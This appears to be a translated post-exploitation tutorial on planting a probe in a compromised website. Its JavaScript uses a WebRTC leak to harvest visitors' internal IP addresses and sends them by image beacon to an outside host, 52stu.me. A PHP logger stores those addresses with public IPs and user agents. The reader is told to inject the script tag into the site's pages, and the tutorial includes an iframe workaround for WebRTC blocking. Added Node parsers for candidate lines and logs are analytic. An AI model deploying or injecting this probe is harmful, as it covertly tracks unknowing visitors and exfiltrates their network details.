Preface

After gaining access to a site, if you want to know who visits it, the obvious source is the web server's logs. But sometimes privilege escalation fails and you never get server-level access; in that case you can plant a probe instead.

Using the probe

The probe recommended here has two parts, a JS part and a PHP part: the JS captures the information, and the PHP assembles it and writes it out. The JS on its own cannot deliver the visitor's internal address to you; it only extracts the address inside the browser (via WebRTC ICE candidates) and needs the PHP side to receive and store it. If the visitor has no internal address, it seems nothing is recorded at all: the JS only fires a request when it finds one, and note that current browsers hide the local address behind an mDNS ".local" name, which the probe's address regex does not match.

Save the PHP code as T.php and upload it to a server (your own or the target's), give it read/write permission, and for this walkthrough assume its URL is http://52stu.me/js/T.php

Save the JS code as T.js and upload it to a server (again, your own or the target's); assume its URL is http://52stu.me/js/T.js

Then include it in the page whose visitors you want to record: <script src='http://52stu.me/js/T.js'></script>. In a PHP page, for example, that is: echo "<script src='http://52stu.me/js/T.js'></script>";

The JS code

The src value on the last line of the code must be changed to the URL of your PHP file!

function getIPs(callback){
    var ip_dups = {};

    // compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;

    // bypass naive webrtc blocking using an iframe
    if(!RTCPeerConnection){
        // NOTE: you need to have an iframe in the page right above the script tag
        //
        // <iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
        // <script>...getIPs called in here...
        //
        var win = document.getElementById("iframe").contentWindow;
        RTCPeerConnection = win.RTCPeerConnection
            || win.mozRTCPeerConnection
            || win.webkitRTCPeerConnection;
    }

    // minimal requirements for a data connection
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };
    // a public STUN server is what makes the browser enumerate its addresses
    var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

    // construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);

    function handleCandidate(candidate){
        // match just the IP address (IPv4, or an uncompressed 8-group IPv6 address)
        var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/;
        var match = ip_regex.exec(candidate);
        // a candidate without a literal IP (e.g. an mDNS ".local" hostname) gives no
        // match; skip it instead of throwing on match[1]
        if(!match) return;
        var ip_addr = match[1];
        // remove duplicates
        if(ip_dups[ip_addr] === undefined)
            callback(ip_addr);
        ip_dups[ip_addr] = true;
    }

    // listen for candidate events
    pc.onicecandidate = function(ice){
        // skip non-candidate events
        if(ice.candidate)
            handleCandidate(ice.candidate.candidate);
    };

    // create a bogus data channel
    pc.createDataChannel("");

    // create an offer sdp
    pc.createOffer(function(result){
        // trigger the stun server request
        pc.setLocalDescription(result, function(){}, function(){});
    }, function(){});

    // wait a while to let everything finish
    setTimeout(function(){
        if(!pc.localDescription) return;
        // read candidate info from the local description as well
        var lines = pc.localDescription.sdp.split('\n');
        lines.forEach(function(line){
            if(line.indexOf('a=candidate:') === 0)
                handleCandidate(line);
        });
    }, 1000);
}

// Test: print the IP addresses into the console
// (left commented out; it expects a "client" browser/OS detection object that this file does not define)
// var browser = [];
// var system = [];
// var info = "";
//
// for (value in client.browser){
//     if(client.browser[value] != 0 && client.browser[value] != undefined){
//         browser.push(value)
//     }
// }
//
// for (sys in client.system){
//     if(client.system[sys] != 0 && client.system[sys] != undefined){
//         system.push(sys)
//     }
// }
// browser = system[0] + " " + browser[0] + ':' + client.browser[browser[1]];

// Report each address to T.php with an image beacon; change the src to the URL of your PHP file
getIPs(function(ip){new Image().src="http://52stu.me/js/T.php?ip="+encodeURIComponent(ip)});
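The probe above reduces every ICE candidate to "the first thing that looks like an IP". As an added example (not code from the original post), here is a proper parser for the a=candidate: lines that handleCandidate() receives. It keeps the candidate type (host vs. server-reflexive vs. relay), accepts compressed IPv6, and recognises the mDNS ".local" hostnames that current browsers emit in place of private IPs, which is the case where the original regex finds nothing. The SDP lines and the function names are constructed for this example.

```javascript
// Constructed sample of candidate lines, not captured from a real session.
const SAMPLE_SDP = [
  "a=candidate:1 1 udp 2122260223 192.168.1.23 54321 typ host generation 0",
  "a=candidate:2 1 udp 1686052607 203.0.113.45 54321 typ srflx raddr 192.168.1.23 rport 54321 generation 0",
  "a=candidate:3 1 udp 2122260223 fe80::1c2b:3d4e:5f60:7a8b 54322 typ host generation 0",
  "a=candidate:4 1 udp 2122260223 3f2c7d5a-9b1e-4f6a-8c3d-2e1f0a9b8c7d.local 54323 typ host generation 0",
  "a=candidate:1 1 tcp 1518280447 192.168.1.23 9 typ host tcptype active generation 0",
  "a=end-of-candidates",
];

const IPV4 = /^(\d{1,3})(\.\d{1,3}){3}$/;
const IPV6 = /^[0-9a-f]*:[0-9a-f:.]*$/i;   // loose: hex digits with at least one colon

function classifyAddress(addr) {
  if (IPV4.test(addr)) return "ipv4";
  if (IPV6.test(addr)) return "ipv6";
  if (/\.local$/i.test(addr)) return "mdns";  // private IP hidden behind an mDNS name
  return "unknown";
}

// Parse one candidate-attribute (RFC 5245 syntax):
//   candidate:<foundation> <component> <transport> <priority> <address> <port> typ <type> ...
// Returns null for anything that is not a well-formed candidate line.
function parseCandidate(line) {
  const body = line.replace(/^a=/, "");
  const t = body.trim().split(/\s+/);
  if (t.length < 8 || !t[0].startsWith("candidate:") || t[6] !== "typ") return null;
  return {
    foundation: t[0].slice("candidate:".length),
    component: Number(t[1]),
    transport: t[2].toLowerCase(),
    priority: Number(t[3]),
    address: t[4],
    port: Number(t[5]),
    type: t[7],
    addressKind: classifyAddress(t[4]),
  };
}

// Collect unique addresses per candidate type. mDNS names get their own bucket:
// they reveal nothing about the LAN and the original probe's regex ignores them.
function collectAddresses(lines) {
  const out = { host: [], srflx: [], relay: [], mdns: [] };
  const seen = new Set();
  for (const line of lines) {
    const c = parseCandidate(line);
    if (!c) continue;
    const bucket = c.addressKind === "mdns" ? "mdns" : c.type;
    if (!(bucket in out)) continue;        // e.g. prflx, not interesting here
    const key = bucket + "|" + c.address;
    if (seen.has(key)) continue;           // same IP over udp and tcp counts once
    seen.add(key);
    out[bucket].push(c.address);
  }
  return out;
}

console.log(collectAddresses(SAMPLE_SDP));
```

Run under Node; with the sample input the host bucket holds the private IPv4 and the link-local IPv6, the srflx bucket holds the public address the STUN server reflected back, and the mDNS name lands in its own bucket rather than being dropped silently. In the browser you would feed it the same strings the probe gets from ice.candidate.candidate and pc.localDescription.sdp.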

The PHP code

The PHP code takes the internal address it receives, adds the visitor's public address and User-Agent from the request, and appends everything to a text file. Create browser.txt next to it beforehand and give it read/write permission. Keep in mind that the ?ip= value and the X-Forwarded-For / Client-IP headers are all supplied by the client, so nothing in the file except REMOTE_ADDR is verified.

<?php
// Address reported by T.js through the ?ip= parameter. It comes straight from the
// client, so treat it as untrusted text rather than a verified internal IP.
$iterateIP = isset($_GET['ip']) ? $_GET['ip'] : '';

function getIP()
{
    // X-Forwarded-For and Client-IP are request headers, so a visitor can set them to
    // anything; only REMOTE_ADDR is filled in by the web server itself.
    if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
        $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
    } else if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
        $ip = $_SERVER["HTTP_CLIENT_IP"];
    } else if (!empty($_SERVER["REMOTE_ADDR"])) {
        $ip = $_SERVER["REMOTE_ADDR"];
    } else if (getenv("HTTP_X_FORWARDED_FOR")) {
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    } else if (getenv("HTTP_CLIENT_IP")) {
        $ip = getenv("HTTP_CLIENT_IP");
    } else if (getenv("REMOTE_ADDR")) {
        $ip = getenv("REMOTE_ADDR");
    } else {
        $ip = "Unknown";
    }
    $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'Unknown';
    return $ip . " " . $ua;
}

// One record per line: strip CR/LF from the client-supplied fields so a crafted
// request cannot inject extra lines into browser.txt.
$clean = function ($s) { return str_replace(array("\r", "\n"), " ", $s); };
$browser_info = date("Y-m-d H:i:s") . " " . $clean($iterateIP) . " " . $clean(getIP()) . "\r\n";

$myfile = fopen("browser.txt", "a+");
if ($myfile !== false) {
    fwrite($myfile, $browser_info);
    fclose($myfile);
}
?>
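Reading browser.txt back is less trivial than the one-line format suggests, because two of its fields are untrusted: the ?ip= value is whatever the client sent, and X-Forwarded-For may carry a comma-separated chain of addresses rather than one. As an added example (not code from the original post), the following Node script parses the file's "<date> <time> <ip-from-T.js> <ip-from-headers> <user-agent>" lines, handles both cases, and flags entries whose reported internal address is not an IP at all. The log lines and function names are constructed for this example.

```javascript
// Constructed sample of browser.txt contents, in the exact layout T.php writes.
const SAMPLE_LOG = [
  "2016-05-01 10:20:30 192.168.1.23 203.0.113.45 Mozilla/5.0 (Windows NT 10.0) Chrome/50.0",
  "2016-05-01 10:21:00 10.0.0.7 198.51.100.9, 203.0.113.1 Mozilla/5.0 (X11; Linux x86_64)",
  "2016-05-01 10:22:15 <script>alert(1)</script> 203.0.113.45 curl/7.47.0",
  "2016-05-01 10:23:40 192.168.1.23 Unknown Mozilla/5.0",
  "not a log line",
].join("\r\n");

// IPv4 dotted quad, or a loose IPv6 shape (hex with at least one colon).
const IP_RE = /^(?:(?:\d{1,3}\.){3}\d{1,3}|[0-9a-f]*:[0-9a-f:.]*)$/i;

function parseLogLine(line) {
  const t = line.split(" ");
  if (t.length < 5 || !/^\d{4}-\d{2}-\d{2}$/.test(t[0]) || !/^\d{2}:\d{2}:\d{2}$/.test(t[1])) return null;
  const webrtcIp = t[2];
  // The header field is either "Unknown" or one or more IPs separated by ", "
  // (X-Forwarded-For lists client first, then each proxy that appended itself).
  const chain = [];
  let i = 3;
  if (t[i] === "Unknown") {
    i++;
  } else {
    while (i < t.length) {
      const tok = t[i].replace(/,$/, "");
      if (!IP_RE.test(tok)) break;
      chain.push(tok);
      i++;
      if (!t[i - 1].endsWith(",")) break;   // no trailing comma: the chain ended here
    }
    if (chain.length === 0) return null;
  }
  return {
    timestamp: t[0] + " " + t[1],
    webrtcIp,
    webrtcIpValid: IP_RE.test(webrtcIp),    // false means ?ip= was not a real address
    clientIp: chain[0] || null,              // claimed client, unverified if it came from a header
    proxies: chain.slice(1),
    userAgent: t.slice(i).join(" "),         // everything after the address field
  };
}

function parseLog(text) {
  const entries = [], rejected = [];
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line) continue;
    const e = parseLogLine(line);
    if (e) entries.push(e); else rejected.push(line);
  }
  return { entries, rejected };
}

// Entries whose ?ip= value is not an IP literal: someone requested T.php by hand,
// or tried to inject content into the log.
function tamperedEntries(text) {
  return parseLog(text).entries.filter(e => !e.webrtcIpValid);
}

console.log(parseLog(SAMPLE_LOG));
console.log("tampered:", tamperedEntries(SAMPLE_LOG).map(e => e.timestamp));
```

The parser deliberately treats the "Unknown" placeholder and the multi-hop X-Forwarded-For case explicitly instead of splitting on the first four spaces, which is what breaks as soon as a proxy chain appears. Anything that cannot be parsed is returned in rejected rather than dropped, so log tampering stays visible.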

Summary

This probe uses JavaScript to collect the data in the visitor's browser, hands it to the PHP code with an image request, and the PHP code adds the request details and writes everything to a file.